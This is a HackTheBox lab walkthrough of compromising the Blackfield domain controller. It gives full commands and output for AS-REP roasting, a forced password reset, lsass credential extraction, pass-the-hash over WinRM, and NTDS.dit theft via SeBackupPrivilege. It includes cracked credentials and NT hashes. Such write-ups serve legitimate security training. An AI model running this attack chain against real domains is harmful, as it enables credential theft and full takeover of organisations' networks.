Blackfield on HackTheBox

Before all

Victim's IP: 10.10.10.192
Victim's host: *.blackfield.local
Attacker's IP: 10.10.14.14

RECON

port scan

Command

rustscan -a 10.10.10.192 --ulimit 5000 -- -sC -sV -Pn

Result

PORT     STATE SERVICE       REASON          VERSION
53/tcp   open  domain        syn-ack ttl 127 Simple DNS Plus
88/tcp   open  kerberos-sec  syn-ack ttl 127 Microsoft Windows Kerberos (server time: 2024-12-26 14:03:18Z)
135/tcp  open  msrpc         syn-ack ttl 127 Microsoft Windows RPC
389/tcp  open  ldap          syn-ack ttl 127 Microsoft Windows Active Directory LDAP (Domain: BLACKFIELD.local0., Site: Default-First-Site-Name)
445/tcp  open  microsoft-ds? syn-ack ttl 127
593/tcp  open  ncacn_http    syn-ack ttl 127 Microsoft Windows RPC over HTTP 1.0
3268/tcp open  ldap          syn-ack ttl 127 Microsoft Windows Active Directory LDAP (Domain: BLACKFIELD.local0., Site: Default-First-Site-Name)
5985/tcp open  http          syn-ack ttl 127 Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
Service Info: Host: DC01; OS: Windows; CPE: cpe:/o:microsoft:windows

Another standard AD domain controller: SMB, LDAP, RPC, Kerberos and WinRM (5985) are all open, and the LDAP banner gives both the domain name, blackfield.local, and the host name, DC01. The Kerberos banner also reports the DC's clock (2024-12-26 14:03:18Z); Kerberos tolerates at most five minutes of skew by default, so it is worth checking the attacker clock against it now, otherwise the kerbrute and impacket steps below fail with KRB_AP_ERR_SKEW.

Exploit

smb info leak

SMB accepts a null session (no credentials), so the share list can be enumerated anonymously.
Command

smbclient -L //10.10.10.192/ -N

Result

        Sharename       Type      Comment
        ---------       ----      -------
        ADMIN$          Disk      Remote Admin
        C$              Disk      Default share
        forensic        Disk      Forensic / Audit share.
        IPC$            IPC       Remote IPC
        NETLOGON        Disk      Logon server share
        profiles$       Disk
        SYSVOL          Disk      Logon server share
Reconnecting with SMB1 for workgroup listing.
do_connect: Connection to 10.10.10.192 failed (Error NT_STATUS_IO_TIMEOUT)
Unable to connect with SMB1 -- no workgroup available

Trying the shares one by one, profiles$ is readable anonymously and contains a large number of per-user directories. Those directory names are a ready-made username list; the next step is to find out which of them are real domain accounts.

smbclient //10.10.10.192/profiles$ -N
Try "help" to get a list of possible commands.
smb: \> dir
  .                                   D        0  Wed Jun  3 12:47:12 2020
  ..                                  D        0  Wed Jun  3 12:47:12 2020
  AAlleni                             D        0  Wed Jun  3 12:47:11 2020
  ABarteski                           D        0  Wed Jun  3 12:47:11 2020
  ABekesz                             D        0  Wed Jun  3 12:47:11 2020
  ABenzies                            D        0  Wed Jun  3 12:47:11 2020
  ABiemiller                          D        0  Wed Jun  3 12:47:11 2020
  AChampken                           D        0  Wed Jun  3 12:47:11 2020
  ACheretei                           D        0  Wed Jun  3 12:47:11 2020
  ACsonaki                            D        0  Wed Jun  3 12:47:11 2020
  AHigchens                           D        0  Wed Jun  3 12:47:11 2020
  AJaquemai                           D        0  Wed Jun  3 12:47:11 2020
  AKlado                              D        0  Wed Jun  3 12:47:11 2020
  AKoffenburger                       D        0  Wed Jun  3 12:47:11 2020
  ...(truncated)
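As an added example (not part of the original writeup), here is a small shell helper that turns an smbclient directory listing into the one-name-per-line file kerbrute expects. The listing embedded in the script is a constructed sample in smbclient's output format, including a duplicate, a file entry and the trailing block-count line that all have to be skipped; the share and host are the ones from this box.

```shell
#!/usr/bin/env bash
# Added example, not from the original writeup: build a kerbrute username
# list from an smbclient "dir" listing of profiles$.
set -eu

# Constructed sample of smbclient's "dir" output (the real listing comes from
# smbclient //10.10.10.192/profiles$ -N -c dir). It deliberately mixes in a
# duplicate, a file entry and the summary line so the parser has to skip them.
SAMPLE_LISTING='  .                                   D        0  Wed Jun  3 12:47:12 2020
  ..                                  D        0  Wed Jun  3 12:47:12 2020
  AAlleni                             D        0  Wed Jun  3 12:47:11 2020
  ABarteski                           D        0  Wed Jun  3 12:47:11 2020
  svc_backup                          D        0  Wed Jun  3 12:47:11 2020
  AAlleni                             D        0  Wed Jun  3 12:47:11 2020
  readme.txt                          A      120  Wed Jun  3 12:47:11 2020

                7846143 blocks of size 4096. 3954796 blocks available'

# Read an smbclient listing on stdin and print directory names, one per line,
# without "." and "..", de-duplicated. Every entry line ends with a five-field
# date ("Wed Jun  3 12:47:11 2020") preceded by the size and the attribute
# letters; everything before those fields is the name, so names containing
# spaces survive too.
profile_dirs_to_userlist() {
    LC_ALL=C awk '
        NF >= 8 && $(NF-6) ~ /^[ADHRSN]+$/ && $(NF-5) ~ /^[0-9]+$/ {
            attrs = $(NF-6)
            name = $1
            for (i = 2; i <= NF-7; i++) name = name " " $i
            if (attrs ~ /D/ && name != "." && name != "..") print name
        }' | LC_ALL=C sort -u
}

# How many candidate names a listing yields: a sanity check before a long
# kerbrute run (kerbrute logs one 4768 event per name on the DC).
count_candidates() {
    profile_dirs_to_userlist | wc -l | tr -d ' '
}

# Demo on the constructed sample. Against the live box, pipe smbclient in:
#   smbclient //10.10.10.192/profiles$ -N -c dir | profile_dirs_to_userlist > userlist.txt
printf '%s\n' "$SAMPLE_LISTING" | profile_dirs_to_userlist
```

The attribute column is matched as a run of smbclient's attribute letters rather than a bare `D`, because real shares return combinations such as `DH` or `DA` for hidden or archived directories.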

Use kerbrute to enumerate which of these names are valid domain accounts. It sends an AS-REQ without pre-authentication for each name and tells valid accounts apart from unknown ones by the KDC's error code, so no password is needed (each attempt is logged as a 4768 event on the DC, so it is not quiet):
Command

kerbrute userenum -d BLACKFIELD.local --dc 10.10.10.192 userlist.txt

Version: v1.0.3 (9dad6e1) - 12/26/24 - Ronnie Flathers @ropnop

2024/12/26 01:21:18 > Using KDC(s):
2024/12/26 01:21:18 > 10.10.10.192:88

2024/12/26 01:21:24 > [+] VALID USERNAME: support@BLACKFIELD.local

AS-REP Roasting

Use impacket's GetNPUsers to attempt AS-REP roasting against every enumerated name. Accounts flagged "Do not require Kerberos preauthentication" answer an unauthenticated AS-REQ with an AS-REP whose encrypted part is keyed from the user's password, which can then be cracked offline:

impacket-GetNPUsers -dc-ip 10.10.10.192 -request -usersfile userlist.txt blackfield.local/
$krb5asrep$23$support@BLACKFIELD.LOCAL:22deb12d556b6b2883f8053667d775c9$57473ab335b4fc89f83ed373107f6136800b0d2d5f77ebe4bf2b27b4bd27016a8b89f02d69a17b4d2c4b7da6237f87e9662d107ceb273f0fdb0edcaf139019168638db5e6685e118036fe0d6e51e58d521e9aa85b63c2220d88e0a1298f704c9c5cfe45162695ed036c09cd72f2a2517ea105a72c1e99da72c07ecfc8a3a53dfd4f987c6ded59471b8767df9eb0ab37043358fbf5364ca177987dc3bc1c1a1eed6603f200f250ffd1e57b2b86fcfbda19e6e1328422e43d127c54f50913037a555bdee01cb8110c3f3ec9b12bac5b9fd24a6610ed360b8e80ea1d0054472598fa7c2e2537b9c396c5735df552f55ab39bd143424

What came back is not a TGT but the encrypted part of the AS-REP, encrypted with a key derived from support's password (etype 23, RC4-HMAC). Save it to a file and crack it with john, whose krb5asrep format detects the hash automatically:

john hash --wordlist=/home/kali/rockyou.txt

Recovered password for support: #00^BlackKnight
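Before spending time on cracking, it pays to confirm that what GetNPUsers printed is a complete AS-REP hash (the line is easy to truncate when copying) and to know which on-disk format you have. The following shell helper, an added example that is not part of the original writeup, pulls the hash lines out of GetNPUsers output, checks their shape, and rewrites the default hashcat layout to john's older `$krb5asrep$user@REALM:...` layout (what `-format john` prints). The sample output is constructed; its checksum and ciphertext are dummy hex, not the real hash from this box.

```shell
#!/usr/bin/env bash
# Added example, not from the original writeup: extract and sanity-check
# AS-REP hashes from impacket-GetNPUsers output.
set -eu

# Constructed sample of GetNPUsers -request output. The checksum/ciphertext
# hex is dummy data, not the real AS-REP from this box.
SAMPLE_OUTPUT=$(cat <<'EOF'
[-] User AAlleni doesn't have UF_DONT_REQUIRE_PREAUTH set
$krb5asrep$23$support@BLACKFIELD.LOCAL:0123456789abcdef0123456789abcdef$a1b2c3d4e5f60718293a4b5c6d7e8f90a1b2c3d4
[-] User ABarteski doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
EOF
)

# Keep only the hash lines; the [-] status lines must not end up in the file
# handed to john or hashcat.
extract_asrep_hashes() {
    grep '^\$krb5asrep\$' || true
}

# Hashcat-format AS-REP hash:
#   $krb5asrep$<etype>$<user>@<REALM>:<32 hex checksum>$<hex ciphertext>
# etype 23 is RC4-HMAC, the etype the usual john/hashcat modes crack.
asrep_hash_is_wellformed() {
    printf '%s\n' "$1" | grep -Eq '^\$krb5asrep\$23\$[^:@$]+@[^:$]+:[0-9a-f]{32}\$[0-9a-f]+$'
}

# john's own krb5asrep layout (GetNPUsers -format john) omits the etype field;
# rewrite from the hashcat layout so either cracker can read the file.
asrep_to_john_format() {
    sed -E 's/^\$krb5asrep\$23\$/$krb5asrep$/'
}

# Demo: validate every hash in the sample and print the john-format version.
printf '%s\n' "$SAMPLE_OUTPUT" | extract_asrep_hashes | while IFS= read -r h; do
    if asrep_hash_is_wellformed "$h"; then
        printf '%s\n' "$h" | asrep_to_john_format
    else
        printf 'malformed or truncated hash: %s\n' "$h" >&2
    fi
done
```

A hash that fails the shape check is almost always a copy-paste truncation; re-run GetNPUsers with `-outputfile` rather than trying to repair it by hand.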

ForceChangePassword

First collect domain information with BloodHound, using the Python collector authenticated as support:

bloodhound-python -c All -u support -p '#00^BlackKnight' -d blackfield.local -ns 10.10.10.192 --zip

BloodHound shows that support has the ForceChangePassword edge over audit2020, i.e. it can reset that account's password without knowing the current one. This is destructive: it replaces a real user's password and is logged as a password reset (event 4724) on the DC, so on a real engagement it needs explicit sign-off.
First connect with rpcclient as support:

rpcclient -U support //10.10.10.192

Then reset the password over SAMR. setuserinfo2 with information level 23 sets a new password on the target account:

rpcclient $> setuserinfo2 AUDIT2020 23 Whale120

lsass to PSRemote

With audit2020's new password the forensic share is readable, and it contains \memory_analysis\lsass.zip. Since lsass is the process that handles authentication, a memory dump of it is very likely to contain credentials. Download the zip with smbclient and unzip it; file identifies the contents as a Windows minidump.
Dump the secrets out of it with pypykatz:

pypykatz lsa minidump lsass.DMP

INFO:pypykatz:Parsing file lsass.DMP
FILE: ======== lsass.DMP =======
== LogonSession ==
authentication_id 406458 (633ba)
session_id 2
username svc_backup
domainname BLACKFIELD
logon_server DC01
logon_time 2020-02-23T18:00:03.423728+00:00
sid S-1-5-21-4194615774-2175524697-3563712290-1413
luid 406458
== MSV ==
Username: svc_backup
Domain: BLACKFIELD
LM: NA
NT: 9658d1d1dcd9250115e2205d9f48400d
SHA1: 463c13a9a31fc3252c68ba0a44f0221626a33e5c
DPAPI: a03cd8e9d30171f3cfe8caad92fef62100000000
== WDIGEST [633ba]==

The dump yields svc_backup's NT hash. WinRM (5985) is open, so the hash can be used directly for pass-the-hash with evil-winrm (assuming blackfield.local resolves to 10.10.10.192, e.g. via /etc/hosts), and the login succeeds:

evil-winrm -u 'svc_backup' -H '9658d1d1dcd9250115e2205d9f48400d' -i blackfield.local

Privilege Escalation

After logging in, check the token's privileges with whoami /priv:

PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                    State
============================= ============================== =======
SeMachineAccountPrivilege     Add workstations to domain     Enabled
SeBackupPrivilege             Back up files and directories  Enabled
SeRestorePrivilege            Restore files and directories  Enabled
SeShutdownPrivilege           Shut down the system           Enabled
SeChangeNotifyPrivilege       Bypass traverse checking       Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Enabled

SeBackupPrivilege is enabled. It lets the account read any file regardless of its ACL (backup semantics), so the plan is to copy NTDS.dit together with the SYSTEM hive (which holds the boot key needed to decrypt NTDS) to the attacker machine and extract the NTLM hashes locally. NTDS.dit is held open by the running DC and cannot be copied directly, so first create a volume shadow copy with diskshadow, driven by a script file (.dsh), and copy the file out of the shadow:

viper.dsh:

set context persistent nowriters
add volume c: alias viper
create
expose %viper% x:
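diskshadow reads its script as a Windows text file, and a .dsh written on Linux with bare LF line endings is a classic cause of the script being rejected; the usual fix is unix2dos before uploading. The helper below is an added example (not from the original writeup) that writes the script with CRLF endings directly and verifies them, so the file can be uploaded as-is. The alias name, drive letter and file name are the ones used in this writeup.

```shell
#!/usr/bin/env bash
# Added example, not from the original writeup: write the diskshadow script
# with Windows (CRLF) line endings and verify them before upload.
set -eu

# write_dsh ALIAS DRIVE_LETTER OUTFILE
# Emits the four-line shadow-copy script used in this writeup. Every line is
# terminated with \r\n so diskshadow on the DC accepts it without unix2dos.
write_dsh() {
    alias_name="$1"; drive="$2"; out="$3"
    {
        printf 'set context persistent nowriters\r\n'
        printf 'add volume c: alias %s\r\n' "$alias_name"
        printf 'create\r\n'
        printf 'expose %%%s%% %s:\r\n' "$alias_name" "$drive"
    } > "$out"
}

# Number of CR characters in the file.
crlf_count() {
    tr -cd '\r' < "$1" | wc -c | tr -d ' '
}

# Number of lines regardless of line endings.
line_count() {
    wc -l < "$1" | tr -d ' '
}

# Returns 0 when every line ends in CRLF, 1 otherwise.
dsh_has_crlf() {
    [ "$(crlf_count "$1")" = "$(line_count "$1")" ]
}

# Demo: write viper.dsh into a temp dir and report the line endings. The file
# is then uploaded with evil-winrm's "upload viper.dsh" into C:\Temp.
tmp="$(mktemp -d)"
write_dsh viper x "$tmp/viper.dsh"
if dsh_has_crlf "$tmp/viper.dsh"; then
    printf 'ok: %s has CRLF line endings\n' "$tmp/viper.dsh"
else
    printf 'bad line endings in %s\n' "$tmp/viper.dsh" >&2
    exit 1
fi
```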

Then, in the Evil-WinRM session (the .dsh file is uploaded first with Evil-WinRM's upload command; robocopy /b uses backup semantics, which is what SeBackupPrivilege grants):

mkdir C:\Temp
cd C:\Temp
upload viper.dsh
diskshadow /s viper.dsh
robocopy /b x:\windows\ntds . ntds.dit
reg save hklm\system c:\Temp\system

Both files are now in C:\Temp. Pull them to the attacker machine with Evil-WinRM's download command (download ntds.dit, then download system).

Extract the NTLM hashes locally with impacket's secretsdump; LOCAL tells it to parse the offline files instead of connecting to a host:

impacket-secretsdump -ntds ntds.dit -system system LOCAL | grep Administrator

Finally, pass-the-hash with the Administrator NT hash for a full administrative WinRM session:

evil-winrm -u 'Administrator' -H '184fb5e5178480be64824d4cd53b99ee' -i blackfield.local